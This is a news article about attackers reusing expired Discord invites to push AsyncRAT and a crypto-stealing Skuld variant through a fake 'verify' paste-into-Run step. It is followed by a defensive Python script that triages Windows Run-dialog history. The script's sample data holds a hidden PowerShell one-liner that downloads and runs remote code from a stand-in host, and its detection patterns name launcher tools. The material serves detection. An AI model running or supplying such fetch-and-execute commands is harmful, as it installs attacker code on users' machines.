Stratos Ally

Hackers Exploit Expired Discord Invites to Spread Crypto-Stealing Malware


StratosAlly


A novel threat campaign is leveraging a design flaw in the Discord invitation system to distribute AsyncRAT and a customized version of Skuld Stealer, both aimed at stealing cryptocurrency and sensitive user data.

The issue comes from how Discord lets users set up custom invites. When an invite link expires or gets deleted, it can still be re-used, so attackers scoop up old ones and attach them to their own fake servers. That way, people who click what used to be a trusted link end up somewhere dangerous. 

Once there, victims are told to “verify” their identity through a fake bot. Clicking “verify” does nothing helpful; it quietly copies a command to the clipboard. Victims are then told to paste it into their system’s Run box, thinking it’s part of the verification. Instead, the command starts downloading malware.

Behind the scenes, this malware installs two programs. One gives attackers remote access, and the other goes hunting for crypto wallets and login credentials. It’s designed to grab info from browsers, games, and Discord itself. 

Researchers say a similar version of the attack was also, at times, hidden in fake game tools that looked harmless. Victims have popped up in the U.S., Europe, and parts of Asia.

Discord has removed one of the malicious bots used, but the root of the issue, how expired invites can be re-used, still hasn’t been fixed.
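For responders checking whether a user followed the paste-into-Run step described above, the following added example (not from the original article or the researchers) triages Run-dialog history. It assumes the history has been exported from the Windows `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key into a dictionary; the heuristics and the sample entries are constructed for illustration, since the article does not publish the actual command.

```python
import re

# Programs that can fetch or run code when started from the Win+R Run dialog.
LAUNCHERS = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|curl|certutil|bitsadmin)(\.exe)?\b",
    re.IGNORECASE,
)

# Traits of a pasted one-liner rather than something a person types by hand.
INDICATORS = {
    "remote URL": re.compile(r"https?://", re.IGNORECASE),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.IGNORECASE),
    "encoded command": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE),
}

# Constructed sample of exported RunMRU values (value name -> data).
# Windows appends "\1" to each stored command; MRUList holds the ordering.
SAMPLE_RUN_MRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -c "iwr https://example.invalid/verify.txt | iex"\\1',
}


def triage_run_history(run_mru):
    """Return (value_name, command, reasons) for suspicious Run-dialog entries."""
    findings = []
    for name, data in run_mru.items():
        if name.lower() == "mrulist":  # ordering string, not a command
            continue
        command = data[:-2] if data.endswith("\\1") else data
        if not LAUNCHERS.search(command):
            continue  # plain program names such as "notepad" are ignored
        reasons = [label for label, rx in INDICATORS.items() if rx.search(command)]
        if reasons:  # a launcher alone ("cmd") is normal usage
            findings.append((name, command, reasons))
    return findings


if __name__ == "__main__":
    for name, command, reasons in triage_run_history(SAMPLE_RUN_MRU):
        print(f"[!] RunMRU value {name!r}: {command} ({', '.join(reasons)})")
```

A hit is a lead for further investigation, not proof of infection: the entry shows that a command was entered in the Run box, not what it downloaded.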
